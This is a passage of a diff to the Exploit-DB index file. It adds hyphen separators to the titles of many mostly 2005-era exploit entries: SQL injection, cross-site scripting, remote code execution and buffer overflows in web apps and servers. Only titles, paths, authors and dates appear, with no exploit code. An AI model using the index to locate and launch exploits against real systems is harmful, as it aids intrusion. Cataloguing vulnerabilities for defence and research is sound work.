Injection",2005-05-28,Rayden,php,webapps,0 +25756,platforms/php/webapps/25756.txt,"India Software Solution Shopping Cart - SQL Injection",2005-05-28,Rayden,php,webapps,0 25757,platforms/multiple/dos/25757.txt,"Firefly Studios Stronghold 2 - Remote Denial of Service",2005-05-28,"Luigi Auriemma",multiple,dos,0 25758,platforms/asp/webapps/25758.txt,"Hosting Controller 6.1 - User Profile Unauthorized Access",2005-05-30,"GrayHatz Security Group",asp,webapps,0 25759,platforms/php/webapps/25759.txt,"Qualiteam X-Cart 4.0.8 - home.php Multiple Parameter XSS",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps,0 @@ -22930,7 +22925,7 @@ id,file,description,date,author,platform,type,port 25779,platforms/php/webapps/25779.txt,"MyBB - Multiple Cross-Site Scripting / SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 25780,platforms/asp/webapps/25780.txt,"JiRo's Upload System 1.0 - Login.ASP SQL Injection",2005-06-01,Romty,asp,webapps,0 25781,platforms/asp/webapps/25781.txt,"NEXTWEB - (i)Site Login.ASP SQL Injection",2005-06-01,"Jim Pangalos",asp,webapps,0 -25782,platforms/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",windows,dos,0 +25782,platforms/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 - Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",windows,dos,0 25783,platforms/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 - LOGIN.ASP SQL Injection",2005-06-01,"Dj romty",asp,webapps,0 25784,platforms/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation",2005-06-01,"Benjamin Tobias Franz",windows,remote,0 25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injection",2005-06-02,"Dedi Dwianto",asp,webapps,0 @@ -22950,7 +22945,7 @@ id,file,description,date,author,platform,type,port 25799,platforms/php/webapps/25799.txt,"FlatNuke 2.5.x - index.php where Variable Path Disclosure",2005-06-07,SecWatch,php,webapps,0 25800,platforms/php/webapps/25800.txt,"FlatNuke 2.5.x - help.php Multiple Parameter XSS",2005-06-07,SecWatch,php,webapps,0 25801,platforms/php/webapps/25801.php,"FlatNuke 2.5.x - referer.php Crafted Referer Arbitrary PHP Code Execution",2005-06-07,SecWatch,php,webapps,0 -25802,platforms/linux/remote/25802.txt,"C.J. Steele Tattle Remote Command Execution",2005-06-07,b0iler,linux,remote,0 +25802,platforms/linux/remote/25802.txt,"C.J. Steele Tattle - Remote Command Execution",2005-06-07,b0iler,linux,remote,0 25803,platforms/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",php,webapps,0 25804,platforms/asp/webapps/25804.txt,"Loki Download Manager 2.0 - Default.ASP SQL Injection",2005-06-08,hack_912,asp,webapps,0 25805,platforms/asp/webapps/25805.txt,"Loki Download Manager 2.0 - Catinfo.ASP SQL Injection",2005-06-08,hack_912,asp,webapps,0 @@ -22976,7 +22971,7 @@ id,file,description,date,author,platform,type,port 25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0 25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution",2013-05-30,xis_one,windows,remote,0 25837,platforms/linux/dos/25837.txt,"Monkey HTTPD 1.1.1 - Crash PoC",2013-05-30,"Doug Prostko",linux,dos,0 -25838,platforms/php/webapps/25838.pl,"Ultimate PHP Board 1.8/1.9 Weak Password Encryption",2005-06-16,"Alberto Trivero",php,webapps,0 +25838,platforms/php/webapps/25838.pl,"Ultimate PHP Board 1.8/1.9 - Weak Password Encryption",2005-06-16,"Alberto Trivero",php,webapps,0 25839,platforms/asp/webapps/25839.txt,"Cool Cafe Chat 1.2.1 - LOGIN.ASP SQL Injection",2005-06-16,"Morning Wood",asp,webapps,0 25840,platforms/php/webapps/25840.txt,"osCommerce 2.1/2.2 - Multiple HTTP Response Splitting Vulnerabilities",2005-06-17,"James Bercegay",php,webapps,0 25841,platforms/windows/remote/25841.txt,"Yaws 1.5x - Remote Source Code Disclosure",2005-06-17,"Daniel Fabian",windows,remote,0 @@ -22986,14 +22981,14 @@ id,file,description,date,author,platform,type,port 25845,platforms/asp/webapps/25845.txt,"Uapplication Ublog Reload 1.0.5 - Trackback.ASP Cross-Site Scripting",2005-06-20,"Dedi Dwianto",asp,webapps,0 25846,platforms/php/webapps/25846.txt,"cPanel 9.1 - User Parameter Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps,0 25847,platforms/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart - LOGIN.ASP SQL Injection",2003-12-07,G00db0y,asp,webapps,0 -25848,platforms/php/webapps/25848.pl,"PAFaq beta4 Database Unauthorized Access",2005-06-20,james,php,webapps,0 +25848,platforms/php/webapps/25848.pl,"PAFaq beta4 - Database Unauthorized Access",2005-06-20,james,php,webapps,0 25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation (newvalue) Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net Multiple Scripts - Arbitrary Remote Command Execution Vulnerabilities",2005-08-21,sullo@cirt.net,cgi,webapps,0 26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 - Perldiver.CGI Cross-Site Scripting",2005-08-21,"Donnie Werner",cgi,webapps,0 26291,platforms/asp/webapps/26291.txt,"Mall23 - AddItem.ASP SQL Injection",2005-08-21,SmOk3,asp,webapps,0 26292,platforms/osx/dos/26292.html,"Microsoft Internet Explorer 5.2.3 for Mac OS - Denial of Service",2005-08-22,"Mella Marco",osx,dos,0 25851,platforms/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 - db_netserver Stack Buffer Overflow",2013-05-31,Metasploit,windows,remote,8001 -25852,platforms/multiple/dos/25852.py,"ModSecurity Remote Null Pointer Dereference",2013-05-31,"Younes JAAIDI",multiple,dos,0 +25852,platforms/multiple/dos/25852.py,"ModSecurity - Remote Null Pointer Dereference",2013-05-31,"Younes JAAIDI",multiple,dos,0 25853,platforms/asp/webapps/25853.txt,"I-Gallery Folder Argument Directory Traversal",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 25854,platforms/php/webapps/25854.txt,"PAFaq Question Cross-Site Scripting",2005-06-20,"James Bercegay",php,webapps,0 25855,platforms/asp/webapps/25855.txt,"I-Gallery Folder Argument Cross-Site Scripting",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 @@ -23018,7 +23013,7 @@ id,file,description,date,author,platform,type,port 25874,platforms/asp/webapps/25874.txt,"Ipswitch WhatsUp Professional 2005 SP1 - LOGIN.ASP SQL Injection",2005-06-22,anonymous,asp,webapps,0 25875,platforms/php/webapps/25875.txt,"Whois.Cart 2.2.x - Profile.php Cross-Site Scripting",2005-06-23,"Elzar Stuffenbach",php,webapps,0 25876,platforms/php/webapps/25876.txt,"CarLine Forum Russian Board 4.2 - menu_footer.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 -25877,platforms/php/webapps/25877.txt,"CarLine Forum Russian Board 4.2 IMG Tag XSS",2005-06-23,1dt.w0lf,php,webapps,0 +25877,platforms/php/webapps/25877.txt,"CarLine Forum Russian Board 4.2 - IMG Tag XSS",2005-06-23,1dt.w0lf,php,webapps,0 25878,platforms/php/webapps/25878.txt,"CarLine Forum Russian Board 4.2 - menu_header.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 25879,platforms/php/webapps/25879.txt,"CarLine Forum Russian Board 4.2 - menu_tema.php Multiple Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 25880,platforms/php/webapps/25880.txt,"CarLine Forum Russian Board 4.2 - search.php text_poisk Parameter XSS",2005-06-23,1dt.w0lf,php,webapps,0 @@ -23038,7 +23033,7 @@ id,file,description,date,author,platform,type,port 25893,platforms/php/webapps/25893.txt,"CarLine Forum Russian Board 4.2 - line.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25894,platforms/php/webapps/25894.txt,"CarLine Forum Russian Board 4.2 - in.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 25895,platforms/php/webapps/25895.txt,"CarLine Forum Russian Board 4.2 - enter.php Multiple Parameter SQL Injection",2005-06-23,1dt.w0lf,php,webapps,0 -25896,platforms/solaris/local/25896.pl,"Sun Solaris 10 Traceroute Multiple Local Buffer Overflow Vulnerabilities",2005-06-24,"Przemyslaw Frasunek",solaris,local,0 +25896,platforms/solaris/local/25896.pl,"Sun Solaris 10 Traceroute - Multiple Local Buffer Overflow Vulnerabilities",2005-06-24,"Przemyslaw Frasunek",solaris,local,0 25897,platforms/php/webapps/25897.txt,"UBBCentral UBB.threads 5.5.1/6.x - download.php Number Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 25898,platforms/php/webapps/25898.txt,"UBBCentral UBB.threads 5.5.1/6.x - calendar.php Multiple Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 25899,platforms/php/webapps/25899.txt,"UBBCentral UBB.threads 5.5.1/6.x - modifypost.php Number Parameter SQL Injection",2005-06-24,"James Bercegay",php,webapps,0 @@ -23078,7 +23073,7 @@ id,file,description,date,author,platform,type,port 25933,platforms/windows/remote/25933.txt,"slimserve httpd 1.0/1.1 - Directory Traversal",2001-03-04,se00020,windows,remote,0 25934,platforms/php/webapps/25934.txt,"Plague News System 0.7 - CID Parameter SQL Injection",2005-07-04,Easyex,php,webapps,0 25935,platforms/php/webapps/25935.txt,"Plague News System 0.7 - CID Parameter Cross-Site Scripting",2005-07-04,Easyex,php,webapps,0 -25936,platforms/windows/dos/25936.pl,"PlanetDNS PlanetFileServer Remote Buffer Overflow",2005-06-28,fRoGGz,windows,dos,0 +25936,platforms/windows/dos/25936.pl,"PlanetDNS PlanetFileServer - Remote Buffer Overflow",2005-06-28,fRoGGz,windows,dos,0 25937,platforms/php/webapps/25937.txt,"Plague News System 0.7 - Delete.php Access Restriction Bypass",2005-07-04,Easyex,php,webapps,0 25938,platforms/php/webapps/25938.txt,"phpPgAdmin 3.x - Login Form Directory Traversal",2005-07-05,rznvynqqe@hushmail.com,php,webapps,0 25939,platforms/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 - Read.CGI Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps,0 @@ -23102,7 +23097,7 @@ id,file,description,date,author,platform,type,port 25959,platforms/php/webapps/25959.txt,"Spid 1.3 - lang_path File Include",2005-07-11,"skdaemon porra",php,webapps,0 25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - ppa_root_path File Include",2005-07-10,"skdaemon porra",php,webapps,0 25961,platforms/windows/local/25961.c,"SoftiaCom WMailserver 1.0 - Local Information Disclosure",2005-07-09,fRoGGz,windows,local,0 -25962,platforms/asp/dos/25962.xml,"Microsoft ASP.NET 1.0/1.1 RPC/Encoded Remote Denial of Service",2005-07-12,"Bryan Sullivan",asp,dos,0 +25962,platforms/asp/dos/25962.xml,"Microsoft ASP.NET 1.0/1.1 - RPC/Encoded Remote Denial of Service",2005-07-12,"Bryan Sullivan",asp,dos,0 25963,platforms/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injection",2005-07-12,"Diabolic Crab",asp,webapps,0 25964,platforms/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - Inc.Login.php Privilege Escalation",2005-07-11,"Stefan Lochbihler",php,webapps,0 25965,platforms/asp/webapps/25965.txt,"DVBBS 7.1 - ShowErr.ASP Cross-Site Scripting",2005-07-12,rUnViRuS,asp,webapps,0 @@ -23122,13 +23117,13 @@ id,file,description,date,author,platform,type,port 25979,platforms/windows/remote/25979.rb,"Oracle WebCenter Content - CheckOutAndOpen.dll ActiveX Remote Code Execution",2013-06-05,Metasploit,windows,remote,0 25980,platforms/multiple/remote/25980.rb,"Apache Struts - includeParams Remote Code Execution",2013-06-05,Metasploit,multiple,remote,8080 25981,platforms/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injection",2005-07-13,"Soroush Dalili",asp,webapps,0 -25982,platforms/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 Forum.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 +25982,platforms/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 - Forum.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - User.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 -25984,platforms/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 Thread.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 +25984,platforms/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 - Thread.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 25985,platforms/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 - Search.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Exploit (0Day)",2013-06-05,kingcope,php,remote,0 25987,platforms/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation",2013-06-05,"Core Security",hardware,remote,0 -25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 MOD_ORADAV Access Control",2003-02-13,"David Litchfield",multiple,remote,0 +25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 - MOD_ORADAV Access Control",2003-02-13,"David Litchfield",multiple,remote,0 25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0 25990,platforms/php/webapps/25990.txt,"Clever Copy 2.0 - Calendar.php Cross-Site Scripting",2005-07-15,Lostmon,php,webapps,0 25991,platforms/windows/dos/25991.txt,"Microsoft Internet Explorer 5.0.1 - JPEG Image Rendering Unspecified Buffer Overflow",2005-07-15,"Michal Zalewski",windows,dos,0 @@ -23163,7 +23158,7 @@ id,file,description,date,author,platform,type,port 26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0 26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter XSS",2005-07-22,rgod,php,webapps,0 -26022,platforms/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ Unauthorized Access",2005-07-25,d.is.evil,hardware,remote,0 +26022,platforms/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ - Unauthorized Access",2005-07-25,d.is.evil,hardware,remote,0 26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion",2005-07-25,lwdz,php,webapps,0 26024,platforms/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal",2005-07-25,"Martin O'Neal",linux,remote,0 26025,platforms/php/webapps/26025.txt,"Netquery 3.1 - submit.php portnum Parameter XSS",2005-07-25,rgod,php,webapps,0 @@ -23185,7 +23180,7 @@ id,file,description,date,author,platform,type,port 26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - post.php forumid Parameter XSS",2005-07-27,Lostmon,php,webapps,0 26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - announcesys.php forumid Parameter XSS",2005-07-27,Lostmon,php,webapps,0 26043,platforms/php/webapps/26043.txt,"Clever Copy 2.0 - Private Message Unauthorized Access",2005-07-27,Lostmon,php,webapps,0 -26044,platforms/windows/remote/26044.txt,"MDaemon 8.0 Content Filter Directory Traversal",2005-07-27,"Tan Chew Keong",windows,remote,0 +26044,platforms/windows/remote/26044.txt,"MDaemon 8.0 - Content Filter Directory Traversal",2005-07-27,"Tan Chew Keong",windows,remote,0 26045,platforms/php/webapps/26045.txt,"PHPList 2.8.12 - Admin Page SQL Injection",2005-07-28,tgo,php,webapps,0 26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0 26047,platforms/php/webapps/26047.txt,"Easypx41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-29,FalconDeOro,php,webapps,0 @@ -23196,7 +23191,7 @@ id,file,description,date,author,platform,type,port 26052,platforms/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - index.php Calendar Feature Multiple Parameter SQL Injection",2005-07-30,"James Bercegay",php,webapps,0 26053,platforms/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - admin.php contenttypeid Parameter SQL Injection",2005-09-30,FalconDeOro,php,webapps,0 26054,platforms/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 - admin.php XSS",2005-09-30,FalconDeOro,php,webapps,0 -26055,platforms/php/webapps/26055.txt,"Ragnarok Online Control Panel 4.3.4 a Authentication Bypass",2005-07-30,VaLiuS,php,webapps,0 +26055,platforms/php/webapps/26055.txt,"Ragnarok Online Control Panel 4.3.4 a - Authentication Bypass",2005-07-30,VaLiuS,php,webapps,0 26056,platforms/php/webapps/26056.txt,"MySQL AB Eventum 1.x - view.php id Parameter XSS",2005-08-01,"James Bercegay",php,webapps,0 26057,platforms/php/webapps/26057.txt,"MySQL AB Eventum 1.x - list.php release Parameter XSS",2005-08-01,"James Bercegay",php,webapps,0 26058,platforms/php/webapps/26058.txt,"MySQL AB Eventum 1.x - get_jsrs_data.php F Parameter XSS",2005-08-01,"James Bercegay",php,webapps,0 @@ -23215,12 +23210,12 @@ id,file,description,date,author,platform,type,port 26071,platforms/multiple/remote/26071.txt,"NetworkActiv Web Server 1.0/2.0/3.0/3.5 - Cross-Site Scripting",2005-08-04,"Secunia Research",multiple,remote,0 26072,platforms/php/webapps/26072.txt,"PortailPHP 2.4 - Index.php SQL Injection",2005-08-04,abducter_minds@yahoo.com,php,webapps,0 26073,platforms/jsp/webapps/26073.txt,"Resin Application Server 4.0.36 - Source Code Disclosure",2013-06-10,LiquidWorm,jsp,webapps,0 -26332,platforms/multiple/remote/26332.txt,"Oracle 9 XML DB Cross-Site Scripting",2005-10-07,"Alexander Kornbrust",multiple,remote,0 +26332,platforms/multiple/remote/26332.txt,"Oracle 9 - XML DB Cross-Site Scripting",2005-10-07,"Alexander Kornbrust",multiple,remote,0 26327,platforms/php/webapps/26327.txt,"Utopia News Pro 1.1.3 - header.php sitetitle Parameter XSS",2005-10-07,rgod,php,webapps,0 26075,platforms/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform - Privilege Escalation Exploit",2013-06-10,prdelka,hardware,remote,0 26076,platforms/hardware/dos/26076.py,"Cisco ASA < 8.4.4.6 & 8.2.5.32 - Ethernet Information Leak",2013-06-10,prdelka,hardware,dos,0 26077,platforms/php/webapps/26077.txt,"concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,php,webapps,0 -26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 Logs Unauthorized Access",2005-08-23,rgod,php,webapps,0 +26297,platforms/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 - Logs Unauthorized Access",2005-08-23,rgod,php,webapps,0 26298,platforms/php/webapps/26298.txt,"CMS Made Simple 0.10 - Index.php Cross-Site Scripting",2005-09-26,X1ngBox,php,webapps,0 26299,platforms/windows/remote/26299.c,"multitheftauto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote,0 26079,platforms/php/webapps/26079.txt,"Comdev ECommerce 3.0 - Config.php Remote File Inclusion",2005-08-05,anonymous,php,webapps,0 @@ -23248,8 +23243,8 @@ id,file,description,date,author,platform,type,port 26101,platforms/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal And Information Disclosure Vulnerabilities",2005-08-05,anonymous,linux,remote,0 26102,platforms/php/webapps/26102.txt,"PHP-Fusion 4.0/5.0/6.0 - Messages.php SQL Injection",2005-08-06,almaster,php,webapps,0 26103,platforms/php/webapps/26103.txt,"SysCP 1.2.x - Multiple Script Execution Vulnerabilities",2005-08-08,"Christopher Kunz",php,webapps,0 -26104,platforms/php/webapps/26104.html,"Invision Power Board 1.0.3 Attached File Cross-Site Scripting",2005-08-08,V[i]RuS,php,webapps,0 -26105,platforms/php/webapps/26105.html,"E107 Website System 0.6 Attached File Cross-Site Scripting",2005-08-08,edward11,php,webapps,0 +26104,platforms/php/webapps/26104.html,"Invision Power Board 1.0.3 - Attached File Cross-Site Scripting",2005-08-08,V[i]RuS,php,webapps,0 +26105,platforms/php/webapps/26105.html,"E107 Website System 0.6 - Attached File Cross-Site Scripting",2005-08-08,edward11,php,webapps,0 26106,platforms/php/webapps/26106.txt,"Gravity Board X 1.1 - Login SQL Injection",2005-08-08,rgod,php,webapps,0 26107,platforms/asp/webapps/26107.txt,"Dvbbs 7.1/8.2 - dispbbs.asp page Parameter XSS",2005-08-08,Lostmon,asp,webapps,0 26108,platforms/asp/webapps/26108.txt,"Dvbbs 7.1/8.2 - dispuser.asp name Parameter XSS",2005-08-08,Lostmon,asp,webapps,0 @@ -23267,7 +23262,7 @@ id,file,description,date,author,platform,type,port 26120,platforms/php/webapps/26120.txt,"FunkBoard 0.66 - reply.php Multiple Parameter XSS",2005-08-08,rgod,php,webapps,0 26121,platforms/php/webapps/26121.txt,"FunkBoard 0.66 - profile.php Multiple Parameter XSS",2005-08-08,rgod,php,webapps,0 26122,platforms/php/webapps/26122.txt,"FunkBoard 0.66 - register.php Multiple Parameter XSS",2005-08-08,rgod,php,webapps,0 -26123,platforms/multiple/remote/26123.rb,"Java Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0 +26123,platforms/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote,0 26124,platforms/php/webapps/26124.txt,"WordPress WP-SendSms Plugin 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,php,webapps,0 26125,platforms/php/webapps/26125.txt,"Weathermap 0.97c - (editor.php mapname param) Local File Inclusion",2013-06-11,"Anthony Dubuissez",php,webapps,0 26126,platforms/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",php,webapps,0 @@ -23300,7 +23295,7 @@ id,file,description,date,author,platform,type,port 26153,platforms/php/webapps/26153.txt,"My Image Gallery 1.4.1 - index.php Multiple Parameter XSS",2005-08-16,anonymous,php,webapps,0 26154,platforms/asp/webapps/26154.txt,"PersianBlog - Userslist.ASP SQL Injection",2005-08-16,trueend5,asp,webapps,0 26155,platforms/php/webapps/26155.txt,"Soft4e ECW-Shop 6.0.2 - Index.php SQL Injection",2005-08-16,"John Cobb",php,webapps,0 -26156,platforms/asp/webapps/26156.txt,"CPaint 1.3 xmlhttp Request Input Validation",2005-08-16,"Thor Larholm",asp,webapps,0 +26156,platforms/asp/webapps/26156.txt,"CPaint 1.3 - xmlhttp Request Input Validation",2005-08-16,"Thor Larholm",asp,webapps,0 26157,platforms/php/webapps/26157.txt,"ECW Shop 6.0.2 - Index.php Cross-Site Scripting",2005-08-16,"John Cobb",php,webapps,0 26158,platforms/php/webapps/26158.txt,"Soft4e ECW-Shop 6.0.2 - Index.php HTML Injection",2005-08-16,"John Cobb",php,webapps,0 26159,platforms/php/webapps/26159.txt,"PHPFreeNews 1.40 - SearchResults.php Multiple SQL Injection",2005-08-17,h4cky,php,webapps,0 @@ -23341,12 +23336,12 @@ id,file,description,date,author,platform,type,port 26194,platforms/windows/dos/26194.txt,"LeapFTP Client 2.7.3/2.7.4 - .LSQ File Remote Buffer Overflow",2005-08-24,Sowhat,windows,dos,0 26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0 26196,platforms/windows/remote/26196.txt,"BEA WebLogic 7.0/8.1 - Administration Console Cross-Site Scripting",2005-08-24,GomoR,windows,remote,0 -26197,platforms/php/webapps/26197.txt,"Foojan PHPWeblog Html Injection",2005-08-24,ali202,php,webapps,0 +26197,platforms/php/webapps/26197.txt,"Foojan PHPWeblog - Html Injection",2005-08-24,ali202,php,webapps,0 26198,platforms/linux/remote/26198.txt,"Astaro Security Linux 6.0 01 - HTTP CONNECT Unauthorized Access Weakness",2005-08-25,"Oliver Karow",linux,remote,0 26199,platforms/php/webapps/26199.txt,"phpMyAdmin 2.x - Error.php Cross-Site Scripting",2005-08-28,"Michal Cihar",php,webapps,0 26200,platforms/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection",2005-08-29,"Jakob Balle",php,webapps,0 26201,platforms/php/webapps/26201.txt,"PHPWebNotes 2.0 - Api.php Remote File Inclusion",2005-08-29,nf2@scheinwelt.at,php,webapps,0 -26202,platforms/php/webapps/26202.txt,"Looking Glass Cross-Site Scripting",2005-08-27,rgod,php,webapps,0 +26202,platforms/php/webapps/26202.txt,"Looking Glass - Cross-Site Scripting",2005-08-27,rgod,php,webapps,0 26203,platforms/php/webapps/26203.php,"Looking Glass 20040427 - Remote Command Execution",2005-08-27,rgod,php,webapps,0 26204,platforms/php/webapps/26204.pl,"MyBB - Member.php SQL Injection",2005-08-29,W7ED,php,webapps,0 26205,platforms/php/webapps/26205.txt,"Land Down Under 700/701/800/801 - index.php c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 @@ -23398,9 +23393,9 @@ id,file,description,date,author,platform,type,port 26253,platforms/php/webapps/26253.txt,"Land Down Under 800/801 - auth.php m Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 26254,platforms/php/webapps/26254.txt,"Land Down Under 800/801 - plug.php e Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 26255,platforms/php/webapps/26255.php,"Mail-it Now! Upload2Server 1.5 - Arbitrary File Upload",2005-09-13,rgod,php,webapps,0 -26256,platforms/cgi/webapps/26256.txt,"MIVA Merchant 5 Merchant.MVC Cross-Site Scripting",2005-09-14,admin@hyperconx.com,cgi,webapps,0 +26256,platforms/cgi/webapps/26256.txt,"MIVA Merchant 5 - Merchant.MVC Cross-Site Scripting",2005-09-14,admin@hyperconx.com,cgi,webapps,0 26257,platforms/php/webapps/26257.txt,"ATutor 1.5.1 - Password_Reminder.php SQL Injection",2005-09-14,rgod,php,webapps,0 -26258,platforms/php/webapps/26258.txt,"ATutor 1.5.1 Chat Logs Remote Information Disclosure",2005-09-14,rgod,php,webapps,0 +26258,platforms/php/webapps/26258.txt,"ATutor 1.5.1 - Chat Logs Remote Information Disclosure",2005-09-14,rgod,php,webapps,0 26259,platforms/php/webapps/26259.txt,"Noah's Classifieds 1.2/1.3 - Index.php SQL Injection",2005-09-14,trueend5,php,webapps,0 26260,platforms/php/webapps/26260.txt,"TWiki TWikiUsers - Remote Arbitrary Command Execution",2005-09-14,B4dP4nd4,php,webapps,0 26261,platforms/php/webapps/26261.txt,"Noah's Classifieds 1.3 - Index.php Cross-Site Scripting",2005-09-14,trueend5,php,webapps,0 @@ -23428,11 +23423,11 @@ id,file,description,date,author,platform,type,port 26282,platforms/php/webapps/26282.txt,"VBulletin 1.0.1 lite/2.x/3.0 - /admincp/modlog.php orderby Parameter XSS",2005-09-19,deluxe@security-project.org,php,webapps,0 26283,platforms/php/webapps/26283.txt,"VBulletin 1.0.1 lite/2.x/3.0 - /admincp/template.php Multiple Parameter XSS",2005-09-19,deluxe@security-project.org,php,webapps,0 26284,platforms/php/webapps/26284.txt,"MX Shop 3.2 - Index.php Multiple SQL Injection",2005-09-19,"David Sopas Ferreira",php,webapps,0 -26285,platforms/php/webapps/26285.txt,"Hesk 0.92/0.93 Session ID Authentication Bypass",2005-09-20,"Rajesh Sethumadhavan",php,webapps,0 +26285,platforms/php/webapps/26285.txt,"Hesk 0.92/0.93 - Session ID Authentication Bypass",2005-09-20,"Rajesh Sethumadhavan",php,webapps,0 26286,platforms/php/webapps/26286.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Directory Traversal Vulnerabilities",2005-09-20,rgod,php,webapps,0 26287,platforms/php/webapps/26287.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-20,rgod,php,webapps,0 26300,platforms/php/webapps/26300.txt,"LucidCMS 2.0 - Index.php Cross-Site Scripting",2005-09-27,X1ngBox,php,webapps,0 -26301,platforms/windows/dos/26301.txt,"Novell GroupWise 6.5.3 Client Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos,0 +26301,platforms/windows/dos/26301.txt,"Novell GroupWise 6.5.3 Client - Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos,0 26302,platforms/php/webapps/26302.txt,"TWiki TWikiUsers - INCLUDE Function Remote Arbitrary Command Execution",2005-09-28,JChristophFuchs,php,webapps,0 26303,platforms/php/webapps/26303.txt,"CubeCart 3.0.3 - index.php Multiple Parameter XSS",2005-09-28,Lostmon,php,webapps,0 26304,platforms/php/webapps/26304.txt,"CubeCart 3.0.3 - cart.php redir Parameter XSS",2005-09-28,Lostmon,php,webapps,0 @@ -23458,7 